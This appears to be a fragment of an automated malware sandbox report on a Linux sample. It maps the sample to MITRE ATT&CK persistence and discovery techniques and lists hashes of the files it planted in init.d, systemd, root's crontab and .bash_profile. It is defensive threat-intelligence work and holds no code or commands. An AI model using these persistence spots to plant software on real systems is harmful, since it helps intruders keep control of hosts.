Boot or Logon Autostart Execution

T1547

Hijack Execution Flow

T1574

Scheduled Task/Job

T1053

Defense Evasion

Hijack Execution Flow

T1574

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/bin/sysdown

Filesize
596B

MD5
d7f7aaf9f798916b6a9c195a9858f465

SHA1
6c4b169a697def201c0386e277cd71af55e9c0a9

SHA256
d572f7cac611d9597d663b3510e640391271034d07a0842c81c34c0ace9fd3a7

SHA512
2ff253e65134c120668445d6ca9a18b78b18d02869c0cafa07133d6c6d2351a3ee83950176f8973379807108f74997b273afa16d34e9867b79dbdd33af944afe

Download Submit
/etc/init.d/linux-d

Filesize
1KB

MD5
bb962de4ec5f63841f3858020f33564d

SHA1
2df4090fe665cacc39a851a2e6fe9576f36e4854

SHA256
b1b7adf45ddbdeeedf88d633ddd51bda642c020af4a00c4c8864ca6de6054f7c

SHA512
672c648da1c8dcd1f285490cd72a2d45c2d94e31a8aed8bb3f96addbb8d874ccd4a2e6761228cabdeef980943ba71991f27eedfa17a5007ce7c2c77390b6d40f

Download Submit
/etc/systemd/system/linux-d.service

Filesize
329B

MD5
4d396082544188076ae558f1d9cf2c99

SHA1
3b557b402ba836031b7a1305c17391faf240e2a2

SHA256
90804fbd30eaedb6bf1ac6fb890049d785dfa7246c0cdfffc4ac5645cfe80d6a

SHA512
a295944c3e8e0b2a5e8accd17a95ef413a328f5973cf32006e8f76130f01cea9bf969cb5b95dd307fefdb862d04844f8782155560402a9d43b99926fa83a7203

Download Submit
/root/.bash_profile

Filesize
1KB

MD5
2d666208e442c0c2834e9caf3b40f219

SHA1
2509c08d64a8714b3661dbbaa8338a9b8ee38eac

SHA256
132aaffbfdd6e5e11c74d9c28ffcfc694086a9afc950b30b842e4e0a871fb774

SHA512
78feb3880fbe6e4e741c01131baecdd26ac891ab67735b44395ccf2e1515a042a9d98c3333383406610fc7c17632c083195d89ac401a9c3cc9036b4dbce90b86

Download Submit
/var/spool/cron/crontabs/root

Filesize
1KB

MD5
c3356096aee2d76de4551c7944d46a40

SHA1
2ef236e047f0ecce8eb674adebe024da417f4f8b

SHA256
a49221256c08e150634fcd300fea85dc5376f60dd07deea259e09209e952543d

SHA512
1cfbcdb9d5dcf23c0070ed6bb69320fd7dff42dd90254110bd8ad3d31e4541a3a1cd16e8b67af3b621ed8556ad1be36a9977cb85c10738d2c9c48d26c9370f4f

Download Submit

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads